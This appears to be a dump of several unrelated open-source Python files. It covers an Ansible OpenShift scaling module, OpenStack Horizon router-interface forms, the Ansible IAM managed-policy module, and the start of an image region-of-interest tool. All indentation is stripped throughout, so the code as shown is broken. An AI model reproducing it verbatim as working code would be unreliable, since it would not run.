user_values = set(user_def[key].keys()) - set(skip)
if api_values != user_values:
if debug:
print("keys are not equal in dict")
print(user_values)
print(api_values)
return False
result = Utils.check_def_equal(user_def[key], value, skip_keys=skip_keys, debug=debug)
if not result:
if debug:
print("dict returned false")
print(result)
return False
# Verify each key, value pair is the same
else:
if key not in user_def or value != user_def[key]:
if debug:
print("value not equal; user_def does not have key")
print(key)
print(value)
if key in user_def:
print(user_def[key])
return False
if debug:
print('returning true')
return True
class OpenShiftCLIConfig(object):
'''Generic Config'''
def __init__(self, rname, namespace, kubeconfig, options):
self.kubeconfig = kubeconfig
self.name = rname
self.namespace = namespace
self._options = options
@property
def config_options(self):
''' return config options '''
return self._options
def to_option_list(self, ascommalist=''):
'''return all options as a string
if ascommalist is set to the name of a key, and
the value of that key is a dict, format the dict
as a list of comma delimited key=value pairs'''
return self.stringify(ascommalist)
def stringify(self, ascommalist=''):
''' return the options hash as cli params in a string
if ascommalist is set to the name of a key, and
the value of that key is a dict, format the dict
as a list of comma delimited key=value pairs '''
rval = []
for key in sorted(self.config_options.keys()):
data = self.config_options[key]
if data['include'] \
and (data['value'] is not None or isinstance(data['value'], int)):
if key == ascommalist:
val = ','.join(['{}={}'.format(kk, vv) for kk, vv in sorted(data['value'].items())])
else:
val = data['value']
rval.append('--{}={}'.format(key.replace('_', '-'), val))
return rval
# -*- -*- -*- End included fragment: lib/base.py -*- -*- -*-
# -*- -*- -*- Begin included fragment: lib/deploymentconfig.py -*- -*- -*-
# pylint: disable=too-many-public-methods
class DeploymentConfig(Yedit):
''' Class to model an openshift DeploymentConfig'''
default_deployment_config = '''
apiVersion: v1
kind: DeploymentConfig
metadata:
name: default_dc
namespace: default
spec:
replicas: 0
selector:
default_dc: default_dc
strategy:
resources: {}
rollingParams:
intervalSeconds: 1
maxSurge: 0
maxUnavailable: 25%
timeoutSeconds: 600
updatePercent: -25
updatePeriodSeconds: 1
type: Rolling
template:
metadata:
spec:
containers:
- env:
- name: default
value: default
image: default
imagePullPolicy: IfNotPresent
name: default_dc
ports:
- containerPort: 8000
hostPort: 8000
protocol: TCP
name: default_port
resources: {}
terminationMessagePath: /dev/termination-log
dnsPolicy: ClusterFirst
hostNetwork: true
nodeSelector:
type: compute
restartPolicy: Always
securityContext: {}
serviceAccount: default
serviceAccountName: default
terminationGracePeriodSeconds: 30
triggers:
- type: ConfigChange
'''
replicas_path = "spec.replicas"
env_path = "spec.template.spec.containers[0].env"
volumes_path = "spec.template.spec.volumes"
container_path = "spec.template.spec.containers"
volume_mounts_path = "spec.template.spec.containers[0].volumeMounts"
def __init__(self, content=None):
''' Constructor for deploymentconfig '''
if not content:
content = DeploymentConfig.default_deployment_config
super(DeploymentConfig, self).__init__(content=content)
def add_env_value(self, key, value):
''' add key, value pair to env array '''
rval = False
env = self.get_env_vars()
if env:
env.append({'name': key, 'value': value})
rval = True
else:
result = self.put(DeploymentConfig.env_path, {'name': key, 'value': value})
rval = result[0]
return rval
def exists_env_value(self, key, value):
''' return whether a key, value pair exists '''
results = self.get_env_vars()
if not results:
return False
for result in results:
if result['name'] == key:
if 'value' not in result:
if value == "" or value is None:
return True
elif result['value'] == value:
return True
return False
def exists_env_key(self, key):
''' return whether a key, value pair exists '''
results = self.get_env_vars()
if not results:
return False
for result in results:
if result['name'] == key:
return True
return False
def get_env_var(self, key):
'''return a environment variables '''
results = self.get(DeploymentConfig.env_path) or []
if not results:
return None
for env_var in results:
if env_var['name'] == key:
return env_var
return None
def get_env_vars(self):
'''return a environment variables '''
return self.get(DeploymentConfig.env_path) or []
def delete_env_var(self, keys):
'''delete a list of keys '''
if not isinstance(keys, list):
keys = [keys]
env_vars_array = self.get_env_vars()
modified = False
idx = None
for key in keys:
for env_idx, env_var in enumerate(env_vars_array):
if env_var['name'] == key:
idx = env_idx
break
if idx:
modified = True
del env_vars_array[idx]
if modified:
return True
return False
def update_env_var(self, key, value):
'''place an env in the env var list'''
env_vars_array = self.get_env_vars()
idx = None
for env_idx, env_var in enumerate(env_vars_array):
if env_var['name'] == key:
idx = env_idx
break
if idx:
env_vars_array[idx]['value'] = value
else:
self.add_env_value(key, value)
return True
def exists_volume_mount(self, volume_mount):
''' return whether a volume mount exists '''
exist_volume_mounts = self.get_volume_mounts()
if not exist_volume_mounts:
return False
volume_mount_found = False
for exist_volume_mount in exist_volume_mounts:
if exist_volume_mount['name'] == volume_mount['name']:
volume_mount_found = True
break
return volume_mount_found
def exists_volume(self, volume):
''' return whether a volume exists '''
exist_volumes = self.get_volumes()
volume_found = False
for exist_volume in exist_volumes:
if exist_volume['name'] == volume['name']:
volume_found = True
break
return volume_found
def find_volume_by_name(self, volume, mounts=False):
''' return the index of a volume '''
volumes = []
if mounts:
volumes = self.get_volume_mounts()
else:
volumes = self.get_volumes()
for exist_volume in volumes:
if exist_volume['name'] == volume['name']:
return exist_volume
return None
def get_replicas(self):
''' return replicas setting '''
return self.get(DeploymentConfig.replicas_path)
def get_volume_mounts(self):
'''return volume mount information '''
return self.get_volumes(mounts=True)
def get_volumes(self, mounts=False):
'''return volume mount information '''
if mounts:
return self.get(DeploymentConfig.volume_mounts_path) or []
return self.get(DeploymentConfig.volumes_path) or []
def delete_volume_by_name(self, volume):
'''delete a volume '''
modified = False
exist_volume_mounts = self.get_volume_mounts()
exist_volumes = self.get_volumes()
del_idx = None
for idx, exist_volume in enumerate(exist_volumes):
if 'name' in exist_volume and exist_volume['name'] == volume['name']:
del_idx = idx
break
if del_idx != None:
del exist_volumes[del_idx]
modified = True
del_idx = None
for idx, exist_volume_mount in enumerate(exist_volume_mounts):
if 'name' in exist_volume_mount and exist_volume_mount['name'] == volume['name']:
del_idx = idx
break
if del_idx != None:
del exist_volume_mounts[idx]
modified = True
return modified
def add_volume_mount(self, volume_mount):
''' add a volume or volume mount to the proper location '''
exist_volume_mounts = self.get_volume_mounts()
if not exist_volume_mounts and volume_mount:
self.put(DeploymentConfig.volume_mounts_path, [volume_mount])
else:
exist_volume_mounts.append(volume_mount)
def add_volume(self, volume):
''' add a volume or volume mount to the proper location '''
exist_volumes = self.get_volumes()
if not volume:
return
if not exist_volumes:
self.put(DeploymentConfig.volumes_path, [volume])
else:
exist_volumes.append(volume)
def update_replicas(self, replicas):
''' update replicas value '''
self.put(DeploymentConfig.replicas_path, replicas)
def update_volume(self, volume):
'''place an env in the env var list'''
exist_volumes = self.get_volumes()
if not volume:
return False
# update the volume
update_idx = None
for idx, exist_vol in enumerate(exist_volumes):
if exist_vol['name'] == volume['name']:
update_idx = idx
break
if update_idx != None:
exist_volumes[update_idx] = volume
else:
self.add_volume(volume)
return True
def update_volume_mount(self, volume_mount):
'''place an env in the env var list'''
modified = False
exist_volume_mounts = self.get_volume_mounts()
if not volume_mount:
return False
# update the volume mount
for exist_vol_mount in exist_volume_mounts:
if exist_vol_mount['name'] == volume_mount['name']:
if 'mountPath' in exist_vol_mount and \
str(exist_vol_mount['mountPath']) != str(volume_mount['mountPath']):
exist_vol_mount['mountPath'] = volume_mount['mountPath']
modified = True
break
if not modified:
self.add_volume_mount(volume_mount)
modified = True
return modified
def needs_update_volume(self, volume, volume_mount):
''' verify a volume update is needed '''
exist_volume = self.find_volume_by_name(volume)
exist_volume_mount = self.find_volume_by_name(volume, mounts=True)
results = []
results.append(exist_volume['name'] == volume['name'])
if 'secret' in volume:
results.append('secret' in exist_volume)
results.append(exist_volume['secret']['secretName'] == volume['secret']['secretName'])
results.append(exist_volume_mount['name'] == volume_mount['name'])
results.append(exist_volume_mount['mountPath'] == volume_mount['mountPath'])
elif 'emptyDir' in volume:
results.append(exist_volume_mount['name'] == volume['name'])
results.append(exist_volume_mount['mountPath'] == volume_mount['mountPath'])
elif 'persistentVolumeClaim' in volume:
pvc = 'persistentVolumeClaim'
results.append(pvc in exist_volume)
if results[-1]:
results.append(exist_volume[pvc]['claimName'] == volume[pvc]['claimName'])
if 'claimSize' in volume[pvc]:
results.append(exist_volume[pvc]['claimSize'] == volume[pvc]['claimSize'])
elif 'hostpath' in volume:
results.append('hostPath' in exist_volume)
results.append(exist_volume['hostPath']['path'] == volume_mount['mountPath'])
return not all(results)
def needs_update_replicas(self, replicas):
''' verify whether a replica update is needed '''
current_reps = self.get(DeploymentConfig.replicas_path)
return not current_reps == replicas
# -*- -*- -*- End included fragment: lib/deploymentconfig.py -*- -*- -*-
# -*- -*- -*- Begin included fragment: lib/replicationcontroller.py -*- -*- -*-
# pylint: disable=too-many-public-methods
class ReplicationController(DeploymentConfig):
''' Class to model a replicationcontroller openshift object.
Currently we are modeled after a deployment config since they
are very similar. In the future, when the need arises we
will add functionality to this class.
'''
replicas_path = "spec.replicas"
env_path = "spec.template.spec.containers[0].env"
volumes_path = "spec.template.spec.volumes"
container_path = "spec.template.spec.containers"
volume_mounts_path = "spec.template.spec.containers[0].volumeMounts"
def __init__(self, content):
''' Constructor for ReplicationController '''
super(ReplicationController, self).__init__(content=content)
# -*- -*- -*- End included fragment: lib/replicationcontroller.py -*- -*- -*-
# -*- -*- -*- Begin included fragment: class/oc_scale.py -*- -*- -*-
# pylint: disable=too-many-instance-attributes
class OCScale(OpenShiftCLI):
''' Class to wrap the oc command line tools '''
# pylint allows 5
# pylint: disable=too-many-arguments
def __init__(self,
resource_name,
namespace,
replicas,
kind,
kubeconfig='/etc/origin/master/admin.kubeconfig',
verbose=False):
''' Constructor for OCScale '''
super(OCScale, self).__init__(namespace, kubeconfig=kubeconfig, verbose=verbose)
self.kind = kind
self.replicas = replicas
self.name = resource_name
self._resource = None
@property
def resource(self):
''' property function for resource var '''
if not self._resource:
self.get()
return self._resource
@resource.setter
def resource(self, data):
''' setter function for resource var '''
self._resource = data
def get(self):
'''return replicas information '''
vol = self._get(self.kind, self.name)
if vol['returncode'] == 0:
if self.kind == 'dc':
# The resource returned from a query could be an rc or dc.
# pylint: disable=redefined-variable-type
self.resource = DeploymentConfig(content=vol['results'][0])
vol['results'] = [self.resource.get_replicas()]
if self.kind == 'rc':
# The resource returned from a query could be an rc or dc.
# pylint: disable=redefined-variable-type
self.resource = ReplicationController(content=vol['results'][0])
vol['results'] = [self.resource.get_replicas()]
return vol
def put(self):
'''update replicas into dc '''
self.resource.update_replicas(self.replicas)
return self._replace_content(self.kind, self.name, self.resource.yaml_dict)
def needs_update(self):
''' verify whether an update is needed '''
return self.resource.needs_update_replicas(self.replicas)
# pylint: disable=too-many-return-statements
@staticmethod
def run_ansible(params, check_mode):
'''run the oc_scale module'''
oc_scale = OCScale(params['name'],
params['namespace'],
params['replicas'],
params['kind'],
params['kubeconfig'],
verbose=params['debug'])
state = params['state']
api_rval = oc_scale.get()
if api_rval['returncode'] != 0:
return {'failed': True, 'msg': api_rval}
#####
# Get
#####
if state == 'list':
return {'changed': False, 'result': api_rval['results'], 'state': 'list'} # noqa: E501
elif state == 'present':
########
# Update
########
if oc_scale.needs_update():
if check_mode:
return {'changed': True, 'result': 'CHECK_MODE: Would have updated.'} # noqa: E501
api_rval = oc_scale.put()
if api_rval['returncode'] != 0:
return {'failed': True, 'msg': api_rval}
# return the created object
api_rval = oc_scale.get()
if api_rval['returncode'] != 0:
return {'failed': True, 'msg': api_rval}
return {'changed': True, 'result': api_rval['results'], 'state': 'present'} # noqa: E501
return {'changed': False, 'result': api_rval['results'], 'state': 'present'} # noqa: E501
return {'failed': True, 'msg': 'Unknown state passed. [{}]'.format(state)}
# -*- -*- -*- End included fragment: class/oc_scale.py -*- -*- -*-
# -*- -*- -*- Begin included fragment: ansible/oc_scale.py -*- -*- -*-
def main():
'''
ansible oc module for scaling
'''
module = AnsibleModule(
argument_spec=dict(
kubeconfig=dict(default='/etc/origin/master/admin.kubeconfig', type='str'),
state=dict(default='present', type='str', choices=['present', 'list']),
debug=dict(default=False, type='bool'),
kind=dict(default='dc', choices=['dc', 'rc'], type='str'),
namespace=dict(default='default', type='str'),
replicas=dict(default=None, type='int'),
name=dict(default=None, type='str'),
),
supports_check_mode=True,
)
rval = OCScale.run_ansible(module.params, module.check_mode)
if 'failed' in rval:
module.fail_json(**rval)
module.exit_json(**rval)
if __name__ == '__main__':
main()
# -*- -*- -*- End included fragment: ansible/oc_scale.py -*- -*- -*-
| apache-2.0 |
AlexOugh/horizon | openstack_dashboard/dashboards/project/routers/ports/forms.py | 32 | 7792 | # Copyright 2012, Nachi Ueno, NTT MCL, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import logging
from django.core.urlresolvers import reverse
from django.utils.translation import ugettext_lazy as _
from horizon import exceptions
from horizon import forms
from horizon import messages
from openstack_dashboard import api
LOG = logging.getLogger(__name__)
class AddInterface(forms.SelfHandlingForm):
subnet_id = forms.ChoiceField(label=_("Subnet"))
ip_address = forms.IPField(
label=_("IP Address (optional)"), required=False, initial="",
help_text=_("Specify an IP address for the interface "
"created (e.g. 192.168.0.254)."),
version=forms.IPv4 | forms.IPv6, mask=False)
router_name = forms.CharField(label=_("Router Name"),
widget=forms.TextInput(
attrs={'readonly': 'readonly'}))
router_id = forms.CharField(label=_("Router ID"),
widget=forms.TextInput(
attrs={'readonly': 'readonly'}))
failure_url = 'horizon:project:routers:detail'
def __init__(self, request, *args, **kwargs):
super(AddInterface, self).__init__(request, *args, **kwargs)
c = self.populate_subnet_id_choices(request)
self.fields['subnet_id'].choices = c
def populate_subnet_id_choices(self, request):
tenant_id = self.request.user.tenant_id
networks = []
try:
networks = api.neutron.network_list_for_tenant(request, tenant_id)
except Exception as e:
msg = _('Failed to get network list %s') % e
LOG.info(msg)
messages.error(request, msg)
router_id = request.REQUEST.get('router_id',
self.initial.get('router_id'))
if router_id:
redirect = reverse(self.failure_url, args=[router_id])
else:
redirect = reverse('horizon:project:routers:index')
exceptions.handle(request, msg, redirect=redirect)
return
choices = []
for n in networks:
net_name = n.name + ': ' if n.name else ''
choices += [(subnet.id,
'%s%s (%s)' % (net_name, subnet.cidr,
subnet.name or subnet.id))
for subnet in n['subnets']]
if choices:
choices.insert(0, ("", _("Select Subnet")))
else:
choices.insert(0, ("", _("No subnets available")))
return choices
def handle(self, request, data):
if data['ip_address']:
port = self._add_interface_by_port(request, data)
else:
port = self._add_interface_by_subnet(request, data)
msg = _('Interface added')
if port:
msg += ' ' + port.fixed_ips[0]['ip_address']
LOG.debug(msg)
messages.success(request, msg)
return True
def _add_interface_by_subnet(self, request, data):
router_id = data['router_id']
try:
router_inf = api.neutron.router_add_interface(
request, router_id, subnet_id=data['subnet_id'])
except Exception as e:
self._handle_error(request, router_id, e)
try:
port = api.neutron.port_get(request, router_inf['port_id'])
except Exception:
# Ignore an error when port_get() since it is just
# to get an IP address for the interface.
port = None
return port
def _add_interface_by_port(self, request, data):
router_id = data['router_id']
subnet_id = data['subnet_id']
try:
subnet = api.neutron.subnet_get(request, subnet_id)
except Exception:
msg = _('Unable to get subnet "%s"') % subnet_id
self._handle_error(request, router_id, msg)
try:
ip_address = data['ip_address']
body = {'network_id': subnet.network_id,
'fixed_ips': [{'subnet_id': subnet.id,
'ip_address': ip_address}]}
port = api.neutron.port_create(request, **body)
except Exception as e:
self._handle_error(request, router_id, e)
try:
api.neutron.router_add_interface(request, router_id,
port_id=port.id)
except Exception as e:
self._delete_port(request, port)
self._handle_error(request, router_id, e)
return port
def _handle_error(self, request, router_id, reason):
msg = _('Failed to add_interface: %s') % reason
LOG.info(msg)
redirect = reverse(self.failure_url, args=[router_id])
exceptions.handle(request, msg, redirect=redirect)
def _delete_port(self, request, port):
try:
api.neutron.port_delete(request, port.id)
except Exception:
msg = _('Failed to delete port %s') % port.id
LOG.info(msg)
exceptions.handle(request, msg)
class SetGatewayForm(forms.SelfHandlingForm):
network_id = forms.ChoiceField(label=_("External Network"))
router_name = forms.CharField(label=_("Router Name"),
widget=forms.TextInput(
attrs={'readonly': 'readonly'}))
router_id = forms.CharField(label=_("Router ID"),
widget=forms.TextInput(
attrs={'readonly': 'readonly'}))
failure_url = 'horizon:project:routers:index'
def __init__(self, request, *args, **kwargs):
super(SetGatewayForm, self).__init__(request, *args, **kwargs)
c = self.populate_network_id_choices(request)
self.fields['network_id'].choices = c
def populate_network_id_choices(self, request):
search_opts = {'router:external': True}
try:
networks = api.neutron.network_list(request, **search_opts)
except Exception as e:
msg = _('Failed to get network list %s') % e
LOG.info(msg)
messages.error(request, msg)
redirect = reverse(self.failure_url)
exceptions.handle(request, msg, redirect=redirect)
return
choices = [(network.id, network.name or network.id)
for network in networks]
if choices:
choices.insert(0, ("", _("Select network")))
else:
choices.insert(0, ("", _("No networks available")))
return choices
def handle(self, request, data):
try:
api.neutron.router_add_gateway(request,
data['router_id'],
data['network_id'])
msg = _('Gateway interface is added')
LOG.debug(msg)
messages.success(request, msg)
return True
except Exception as e:
msg = _('Failed to set gateway %s') % e
LOG.info(msg)
redirect = reverse(self.failure_url)
exceptions.handle(request, msg, redirect=redirect)
| apache-2.0 |
sgerhart/ansible | lib/ansible/modules/cloud/amazon/iam_managed_policy.py | 30 | 15814 | #!/usr/bin/python
# Copyright: Ansible Project
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['stableinterface'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: iam_managed_policy
short_description: Manage User Managed IAM policies
description:
- Allows creating and removing managed IAM policies
version_added: "2.4"
options:
policy_name:
description:
- The name of the managed policy.
required: True
policy_description:
description:
- A helpful description of this policy, this value is immuteable and only set when creating a new policy.
default: ''
policy:
description:
- A properly json formatted policy
make_default:
description:
- Make this revision the default revision.
default: True
only_version:
description:
- Remove all other non default revisions, if this is used with C(make_default) it will result in all other versions of this policy being deleted.
type: bool
default: 'no'
state:
description:
- Should this managed policy be present or absent. Set to absent to detach all entities from this policy and remove it if found.
default: present
choices: [ "present", "absent" ]
author: "Dan Kozlowski (@dkhenry)"
extends_documentation_fragment:
- aws
- ec2
requirements:
- boto3
- botocore
'''
EXAMPLES = '''
# Create Policy ex nihilo
- name: Create IAM Managed Policy
iam_managed_policy:
policy_name: "ManagedPolicy"
policy_description: "A Helpful managed policy"
policy: "{{ lookup('template', 'managed_policy.json.j2') }}"
state: present
# Update a policy with a new default version
- name: Create IAM Managed Policy
iam_managed_policy:
policy_name: "ManagedPolicy"
policy: "{{ lookup('file', 'managed_policy_update.json') }}"
state: present
# Update a policy with a new non default version
- name: Create IAM Managed Policy
iam_managed_policy:
policy_name: "ManagedPolicy"
policy: "{{ lookup('file', 'managed_policy_update.json') }}"
make_default: false
state: present
# Update a policy and make it the only version and the default version
- name: Create IAM Managed Policy
iam_managed_policy:
policy_name: "ManagedPolicy"
policy: "{ 'Version': '2012-10-17', 'Statement':[{'Effect': 'Allow','Action': '*','Resource': '*'}]}"
only_version: true
state: present
# Remove a policy
- name: Create IAM Managed Policy
iam_managed_policy:
policy_name: "ManagedPolicy"
state: absent
'''
RETURN = '''
policy:
description: Returns the policy json structure, when state == absent this will return the value of the removed policy.
returned: success
type: string
sample: '{
"arn": "arn:aws:iam::aws:policy/AdministratorAccess "
"attachment_count": 0,
"create_date": "2017-03-01T15:42:55.981000+00:00",
"default_version_id": "v1",
"is_attachable": true,
"path": "/",
"policy_id": "ANPALM4KLDMTFXGOOJIHL",
"policy_name": "AdministratorAccess",
"update_date": "2017-03-01T15:42:55.981000+00:00"
}'
'''
import json
import traceback
try:
import botocore
except ImportError:
pass # caught by imported HAS_BOTO3
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.ec2 import (boto3_conn, get_aws_connection_info, ec2_argument_spec, AWSRetry,
camel_dict_to_snake_dict, HAS_BOTO3, compare_policies)
from ansible.module_utils._text import to_native
@AWSRetry.backoff(tries=5, delay=5, backoff=2.0)
def list_policies_with_backoff(iam):
paginator = iam.get_paginator('list_policies')
return paginator.paginate(Scope='Local').build_full_result()
def get_policy_by_name(module, iam, name):
try:
response = list_policies_with_backoff(iam)
except botocore.exceptions.ClientError as e:
module.fail_json(msg="Couldn't list policies: %s" % str(e),
exception=traceback.format_exc(),
**camel_dict_to_snake_dict(e.response))
for policy in response['Policies']:
if policy['PolicyName'] == name:
return policy
return None
def delete_oldest_non_default_version(module, iam, policy):
try:
versions = [v for v in iam.list_policy_versions(PolicyArn=policy['Arn'])['Versions']
if not v['IsDefaultVersion']]
except botocore.exceptions.ClientError as e:
module.fail_json(msg="Couldn't list policy versions: %s" % str(e),
exception=traceback.format_exc(),
**camel_dict_to_snake_dict(e.response))
versions.sort(key=lambda v: v['CreateDate'], reverse=True)
for v in versions[-1:]:
try:
iam.delete_policy_version(PolicyArn=policy['Arn'], VersionId=v['VersionId'])
except botocore.exceptions.ClientError as e:
module.fail_json(msg="Couldn't delete policy version: %s" % str(e),
exception=traceback.format_exc(),
**camel_dict_to_snake_dict(e.response))
# This needs to return policy_version, changed
def get_or_create_policy_version(module, iam, policy, policy_document):
try:
versions = iam.list_policy_versions(PolicyArn=policy['Arn'])['Versions']
except botocore.exceptions.ClientError as e:
module.fail_json(msg="Couldn't list policy versions: %s" % str(e),
exception=traceback.format_exc(),
**camel_dict_to_snake_dict(e.response))
for v in versions:
try:
document = iam.get_policy_version(PolicyArn=policy['Arn'],
VersionId=v['VersionId'])['PolicyVersion']['Document']
except botocore.exceptions.ClientError as e:
module.fail_json(msg="Couldn't get policy version %s: %s" % (v['VersionId'], str(e)),
exception=traceback.format_exc(),
**camel_dict_to_snake_dict(e.response))
# If the current policy matches the existing one
if not compare_policies(document, json.loads(to_native(policy_document))):
return v, False
# No existing version so create one
# There is a service limit (typically 5) of policy versions.
#
# Rather than assume that it is 5, we'll try to create the policy
# and if that doesn't work, delete the oldest non default policy version
# and try again.
try:
version = iam.create_policy_version(PolicyArn=policy['Arn'], PolicyDocument=policy_document)['PolicyVersion']
return version, True
except botocore.exceptions.ClientError as e:
if e.response['Error']['Code'] == 'LimitExceeded':
delete_oldest_non_default_version(module, iam, policy)
try:
version = iam.create_policy_version(PolicyArn=policy['Arn'], PolicyDocument=policy_document)['PolicyVersion']
return version, True
except botocore.exceptions.ClientError as e:
pass
# Handle both when the exception isn't LimitExceeded or
# the second attempt still failed
module.fail_json(msg="Couldn't create policy version: %s" % str(e),
exception=traceback.format_exc(),
**camel_dict_to_snake_dict(e.response))
def set_if_default(module, iam, policy, policy_version, is_default):
if is_default and not policy_version['IsDefaultVersion']:
try:
iam.set_default_policy_version(PolicyArn=policy['Arn'], VersionId=policy_version['VersionId'])
except botocore.exceptions.ClientError as e:
module.fail_json(msg="Couldn't set default policy version: %s" % str(e),
exception=traceback.format_exc(),
**camel_dict_to_snake_dict(e.response))
return True
return False
def set_if_only(module, iam, policy, policy_version, is_only):
if is_only:
try:
versions = [v for v in iam.list_policy_versions(PolicyArn=policy['Arn'])[
'Versions'] if not v['IsDefaultVersion']]
except botocore.exceptions.ClientError as e:
module.fail_json(msg="Couldn't list policy versions: %s" % str(e),
exception=traceback.format_exc(),
**camel_dict_to_snake_dict(e.response))
for v in versions:
try:
iam.delete_policy_version(PolicyArn=policy['Arn'], VersionId=v['VersionId'])
except botocore.exceptions.ClientError as e:
module.fail_json(msg="Couldn't delete policy version: %s" % str(e),
exception=traceback.format_exc(),
**camel_dict_to_snake_dict(e.response))
return len(versions) > 0
return False
def detach_all_entities(module, iam, policy, **kwargs):
try:
entities = iam.list_entities_for_policy(PolicyArn=policy['Arn'], **kwargs)
except botocore.exceptions.ClientError as e:
module.fail_json(msg="Couldn't detach list entities for policy %s: %s" % (policy['PolicyName'], str(e)),
exception=traceback.format_exc(),
**camel_dict_to_snake_dict(e.response))
for g in entities['PolicyGroups']:
try:
iam.detach_group_policy(PolicyArn=policy['Arn'], GroupName=g['GroupName'])
except botocore.exceptions.ClientError as e:
module.fail_json(msg="Couldn't detach group policy %s: %s" % (g['GroupName'], str(e)),
exception=traceback.format_exc(),
**camel_dict_to_snake_dict(e.response))
for u in entities['PolicyUsers']:
try:
iam.detach_user_policy(PolicyArn=policy['Arn'], UserName=u['UserName'])
except botocore.exceptions.ClientError as e:
module.fail_json(msg="Couldn't detach user policy %s: %s" % (u['UserName'], str(e)),
exception=traceback.format_exc(),
**camel_dict_to_snake_dict(e.response))
for r in entities['PolicyRoles']:
try:
iam.detach_role_policy(PolicyArn=policy['Arn'], RoleName=r['RoleName'])
except botocore.exceptions.ClientError as e:
module.fail_json(msg="Couldn't detach role policy %s: %s" % (r['RoleName'], str(e)),
exception=traceback.format_exc(),
**camel_dict_to_snake_dict(e.response))
if entities['IsTruncated']:
detach_all_entities(module, iam, policy, marker=entities['Marker'])
def main():
argument_spec = ec2_argument_spec()
argument_spec.update(dict(
policy_name=dict(required=True),
policy_description=dict(default=''),
policy=dict(type='json'),
make_default=dict(type='bool', default=True),
only_version=dict(type='bool', default=False),
fail_on_delete=dict(type='bool', default=True),
state=dict(default='present', choices=['present', 'absent']),
))
module = AnsibleModule(
argument_spec=argument_spec,
required_if=[['state', 'present', ['policy']]]
)
if not HAS_BOTO3:
module.fail_json(msg='boto3 is required for this module')
name = module.params.get('policy_name')
description = module.params.get('policy_description')
state = module.params.get('state')
default = module.params.get('make_default')
only = module.params.get('only_version')
policy = None
if module.params.get('policy') is not None:
policy = json.dumps(json.loads(module.params.get('policy')))
try:
region, ec2_url, aws_connect_kwargs = get_aws_connection_info(module, boto3=True)
iam = boto3_conn(module, conn_type='client', resource='iam',
region=region, endpoint=ec2_url, **aws_connect_kwargs)
except (botocore.exceptions.NoCredentialsError, botocore.exceptions.ProfileNotFound) as e:
module.fail_json(msg="Can't authorize connection. Check your credentials and profile.",
exceptions=traceback.format_exc(), **camel_dict_to_snake_dict(e.response))
p = get_policy_by_name(module, iam, name)
if state == 'present':
if p is None:
# No Policy so just create one
try:
rvalue = iam.create_policy(PolicyName=name, Path='/',
PolicyDocument=policy, Description=description)
except Exception as e:
module.fail_json(msg="Couldn't create policy %s: %s" % (name, to_native(e)),
exception=traceback.format_exc(),
**camel_dict_to_snake_dict(e.response))
module.exit_json(changed=True, policy=camel_dict_to_snake_dict(rvalue['Policy']))
else:
policy_version, changed = get_or_create_policy_version(module, iam, p, policy)
changed = set_if_default(module, iam, p, policy_version, default) or changed
changed = set_if_only(module, iam, p, policy_version, only) or changed
# If anything has changed we needto refresh the policy
if changed:
try:
p = iam.get_policy(PolicyArn=p['Arn'])['Policy']
except Exception as e:
module.fail_json(msg="Couldn't get policy: %s" % to_native(e),
exception=traceback.format_exc(),
**camel_dict_to_snake_dict(e.response))
module.exit_json(changed=changed, policy=camel_dict_to_snake_dict(p))
else:
# Check for existing policy
if p:
# Detach policy
detach_all_entities(module, iam, p)
# Delete Versions
try:
versions = iam.list_policy_versions(PolicyArn=p['Arn'])['Versions']
except botocore.exceptions.ClientError as e:
module.fail_json(msg="Couldn't list policy versions: %s" % to_native(e),
exception=traceback.format_exc(),
**camel_dict_to_snake_dict(e.response))
for v in versions:
if not v['IsDefaultVersion']:
try:
iam.delete_policy_version(PolicyArn=p['Arn'], VersionId=v['VersionId'])
except botocore.exceptions.ClientError as e:
module.fail_json(msg="Couldn't delete policy version %s: %s" %
(v['VersionId'], to_native(e)),
exception=traceback.format_exc(),
**camel_dict_to_snake_dict(e.response))
# Delete policy
try:
iam.delete_policy(PolicyArn=p['Arn'])
except Exception as e:
module.fail_json(msg="Couldn't delete policy %s: %s" % (p['PolicyName'], to_native(e)),
exception=traceback.format_exc(),
**camel_dict_to_snake_dict(e.response))
# This is the one case where we will return the old policy
module.exit_json(changed=True, policy=camel_dict_to_snake_dict(p))
else:
module.exit_json(changed=False, policy=None)
# end main
if __name__ == '__main__':
main()
| mit |
jjberry/Autotrace | matlab-version/SelectROI.py | 3 | 8422 | #!/usr/bin/env python
'''
SelectROI.py
Written by Jeff Berry 18 Feb 2011
Modified by Gus Hahn-Powell 21 Feb 2014
purpose:
This script is designed to help the user select a region of interest
to use with the set of images selected by the user. The boundaries
can be set either by clicking and dragging, or with the text entry
boxes. When this script is run, it will look for a config file called
ROI_config.txt that specifies the region of interest. If no such file
exists, it will be created when the user presses 'Save'. Saving will
overwrite any previous information in ROI_config.txt.
ROI_config.txt will be used by other scripts, such as image_diversity.py,
Autotrace.py, and TrainNetwork.py.
usage:
python SelectROI.py
'''
import cv
import os, sys
import subprocess
import numpy
from numpy import *
import gtk
import gtk.glade
import gnomecanvas
class ImageWindow:
def __init__(self):
self.onOpen()
self.wTree = gtk.glade.XML("roi.glade", "window1")
self.window = self.wTree.get_widget("window1")
sigs = {"on_window1_destroy" : gtk.main_quit,
"on_button1_clicked" : self.onSave,
"on_button2_clicked" : self.onReset,
"on_topentry_activate" : self.resetByText,
"on_bottomentry_activate" : self.resetByText,
"on_leftentry_activate" : self.resetByText,
"on_rightentry_activate" : self.resetByText}
self.wTree.signal_autoconnect(sigs)
self.statusbar = self.wTree.get_widget("statusbar1")
self.machineCBox = self.wTree.get_widget("combobox1")
self.machineCBox.set_active(-1) #initialize as "UNKNOWN"
self.topentry = self.wTree.get_widget("topentry")
self.bottomentry = self.wTree.get_widget("bottomentry")
self.leftentry = self.wTree.get_widget("leftentry")
self.rightentry = self.wTree.get_widget("rightentry")
self.cbox = self.wTree.get_widget("canvashbox")
self.canvas = gnomecanvas.Canvas(aa=True)
#open an image to see the size
img = cv.LoadImageM(self.datafiles[0], iscolor=False)
